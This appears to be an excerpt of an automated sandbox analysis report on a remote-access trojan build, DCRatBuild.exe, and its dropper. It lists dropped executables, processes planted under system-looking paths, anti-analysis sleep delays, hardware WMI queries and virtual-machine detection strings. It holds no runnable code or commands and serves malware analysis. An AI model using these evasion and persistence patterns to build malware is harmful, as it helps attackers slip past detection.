                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\LMwQZDoR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\pAGUOyAM.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4A94.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\GKQhrBJx.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\YTLXwDIz.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\SFtfhzmX.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C8A.tmpJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dllJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4D85.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\xqfrsuNN.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\zbqSUreo.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\SEFybwug.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\vSFbtVsB.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI43FC.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\hwUMgwXg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\vlAbNuev.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4B03.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\lKQdHBzT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\jyGvCfcb.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4A36.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\aHPfiQDx.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZkmfqpvS.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\nBMUCfZn.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\dYYVtYJg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\AOGsABiv.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI447A.tmpJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\XgvwQtEs.logJump to dropped file
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\JrPikvxc.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\jLWdviZu.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\ClgJzaDG.logJump to dropped file
                                    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4969.tmpJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\uAoBkxMT.logJump to dropped file
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 8032Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -35971150943733603s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -599874s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598859s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598718s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598499s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -598375s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 5316Thread sleep time: -7200000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -597421s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -597250s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -597103s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596999s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596859s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596733s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596623s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 5316Thread sleep time: -300000s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596515s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596406s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596296s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596187s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -596078s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595968s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595859s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595749s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595640s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595530s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595421s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -595289s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -594630s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -594499s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -594385s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -594281s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -594168s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -594062s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593949s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593843s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593734s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593624s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593487s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593359s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593249s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593140s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -593031s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -592921s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -592812s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -592702s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -592540s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -592427s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -592046s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -591878s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -591732s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -591624s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe TID: 1448Thread sleep time: -591515s >= -30000s
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780 FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0049A69B
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_004AC220
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009866E0 ReadFile,FindFirstFileW,CloseHandle,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_2_009866E0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00960050 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,3_2_00960050
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009603E0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,3_2_009603E0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009444C0 GetShortPathNameW,FindFirstFileW,FindNextFileW,FindClose,3_2_009444C0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00988600 FindFirstFileW,FindClose,3_2_00988600
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009A4C70 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,3_2_009A4C70
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00861A20 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,3_2_00861A20
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AE6A3 VirtualQuery,GetSystemInfo,1_2_004AE6A3
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 30000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 599874
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598718
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598499
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598375
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597421
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597250
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597103
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596999
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596733
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596623
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596515
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596406
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596296
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596187
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596078
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595968
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595749
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595640
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595530
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595421
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595289
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594630
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594499
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594385
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594281
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594168
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594062
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593949
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593843
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593734
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593624
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593487
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593359
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593249
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593140
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593031
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592921
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592812
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592702
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592540
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592427
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592046
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591878
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591732
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591624
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591515
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: DCRatBuild.exe, 00000001.00000002.1661019309.0000000002D89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                                    Source: gorkmTnChA.exe, KAdpNCgonFhCnlBRasdZerWl.exe1.11.dr, DCRatBuild.exe.0.dr, ApplicationFrameHost.exe.11.dr, KAdpNCgonFhCnlBRasdZerWl.exe.11.drBinary or memory string: Ag7PBDZHgFS
